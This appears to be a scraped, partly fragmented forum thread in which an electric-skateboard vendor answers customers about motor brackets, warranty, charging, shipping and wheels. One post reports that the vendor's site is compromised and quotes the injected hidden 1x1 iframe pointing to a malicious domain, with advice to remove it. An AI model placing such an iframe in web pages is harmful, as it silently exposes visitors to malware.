  1. We will be conducting a speed test on this motor soon fitted with the higher geared 600 watt board motor cog, running through the 105 mm Abec 11 wheels. We expect speeds over 56 KPH and around 30% faster acceleration. :elektro-skater3:

    UOTE=Beetle;13129]Hi Snickers,

    montierte Halterung.

    Hi Andrew,

What Snickers means is, that a crack in the upper part of the bracket after only 2 months is not due to wear, but a

material/production problem which really should be covered by warranty. And sorry, but i share this point of view.

If it breaks after a year, with lots of wear visible, then i'd say "hey its just worn out, buy a replacement".

    Aloha,

    Beetle

  4. Hi There, We have repair agent for any electrical issues in Germany in the unlikly event of you needing this service let ES know and you will be sent the details. With regards to the motor Mount the bracket has Already been improved they come in a black colour now.Motor brackets will wear down with use but should not need to be replaced for 1-2 years, depending on how you ride.

    :peace::peace:

    @ Andrew

    What kind of repair agents?

I would not complain about your service, which was until now very great, and you respond very quickly to my questions. I am just womder, such a part is not covered under warranty, because that's in my opinion not a wearing part. But did you ever thought, to change anything with the magnesium alloy or to reinforce the motor mount? You see I am not alone with the problem. I have now ordered a new part. Thanks

  5. I’m not sure what is happening here but let’s have not untruths and Exaggerate said on both sides. ES boards are very reliable but need servicing and Maintenance regularly to keep them in good condition- like all E boards. ES are constantly developing the boards especially over the last 6 months from packaging to components. Everybody has an opinion  but please base it on fact and real personal experience, all models are different 500 watt, 600 watt, 800 watt and use completely different componants. Having said this if anybody does have any problems We have a repair Agent set up in Germany now. contact us any time and you will be sent a RA number and the repair address and yes the turn around is very fast ;) Good day and regards Andrew :peace::peace:

  6. Hi Kai, Thanks have forwarded to our website developer, before they resubmit to google.

The site is still compromised and infected!

Here are the results from scan:

    http://www.virustotal.com/file-scan/report.html?id=2587569275e6286bc6107667dd9f0a30a914c9de1ddc1f63b61bf23fde7f41bc-1314008244

I suggest to remove this from sourcecode:

    <iframe frameborder=0 height=1 width=1 scrolling=no src='http://stormnouc.cx.cc/forum.php?tp=5d13ed839d54210e' > </iframe>

And then have a look how the code could be placed.

  7. Hi Rising, There are so many variables with electric motors but generally the higher the input of volts the more torque. If the board was only another 100 watts there would not be a big difference but the battery is now a 36 volt lifepo4, on the previous Air 400 it was a 24 volt. The motor on the previous Air board was also 24 volts, which is now 36 volts + another 100 watts. It is the extra torque and acceleration you get with the higher voltage motor that is the big difference and when all that extra power goes through the smaller 95 mm wheels the acceleration is savage.:peace:

  8. Hi Stephane,

Sorry to hear that. That is frustrating, your part was sent by royal mail to the address you specified. Sometimes royal mail can take longer than its recommended 7 days. If it does not arrive by wednesday let us know and we will send you another part by express courier. :peace:

    Thanks

    Andrew

  9. Hi Matti,

Yes we are very excited over this new Belt Drive Brushless 800 watt motor board, it is the result of continued improvements. The 800 watt motor has been specially built for this board and has massive amounts of torque for high speed acceleration and uphill power. We think the board will actually do around 28-30 mph but the acceleration and mid range pulling power that will shock you. The board is also much more practical due to it been the lightest Off-road board on the market, giving the rider more opportunities to do stunts and tricks. :peace::peace:

    cheers

Schaut mal rein, bis Ende Oktober sind die neuen 800er Alltrack von ES 50 Pfund günstiger, gut immer noch ca 760€ aber immerhin.

    ~ 2,4 GHz Controller

    ~ Reverseswitch für Frontradbetrieb

~ Magnesiumachsen, neuer Brushlessmotor = nur 13,5kg Gesamtgewicht

~ anderen Daten bleiben wie gehabt :)

  10. Sure send us the board back we have to send it back to the courier inspection department to make a claim for the damage cause by them anyway . We know the excitement caused by our boards and the disappointment when things go wrong so we will get you a replacement out as promised ASAP with the mark 3 upgrades on there as compensation for any inconvience caused. :peace::peace:

  11. The lithium battery can take up to 12 hours to charge on its first cycle. The charging cycle you are describing is completely normal as we have told you 3 times previously. We have only sold around 300- 400 of these boards worldwide anyway maybe you know them better than us. We are not interested in doing business with you anymore please return the board to us at the address on the website and we will give you a full refund.

  12. There is nothing wrong with your board as explained to you you just do not know how to operate. The charger goes from red to green when the charger is in trickle mode the battery charger is toping up each cell individually this is completely normal it is lithium battery. The battery is still charging! Your battery is not flat you have to insert the fuse into the side of the battery then it will turn On. You were given a £40 discount so you were sent a remote control with a few scratches on it, we can send you a new controller and we will charge you the £40 again no problem. We can see by the photo you sent there is a very small hairline crack in the motor bracket. We did send you the extra FREE 4 x abec wheels with your board we don't understand how you only received 3 but we will send you one with the replacement motor bracket. Apologies for any inconvience caused by the last 2 and we will be putting in a claim with the courier.

  13. Available in Classic Abec Green or cool purple. The best wheels we have ever tested on ES electric skateboards. @ 107mm they increase the boards ground clearance and are super smooth, much more stable at high speeds which is important on the ES 600 coupled with low road resistance. As recently tested by kai Elektro-skateboard.de :peace:

  14. Hi, Sorry for the delay in answering the new abec wheels for the 400 watt give you a 13mm clearance between the motor bracket and the ground.

The wheel size is 94mm. So they are bigger than the standard wheels. You will have to modify the plastic grey belt cover to make them fit, but it’s easy this can be simply filed down. They come in black or the classic Abec green.:peace:

  15. Hi they are 81 A Abec 11 Gumballs, they have very little road resistance and are very smooth. Anyway Abec you can find reviews of them on line they are the best skateboard wheels you can buy. We have 2 different sizes in stock 1 set for 400 watt and a different size for 600 watt. They will fit straight on any ES board. :peace:
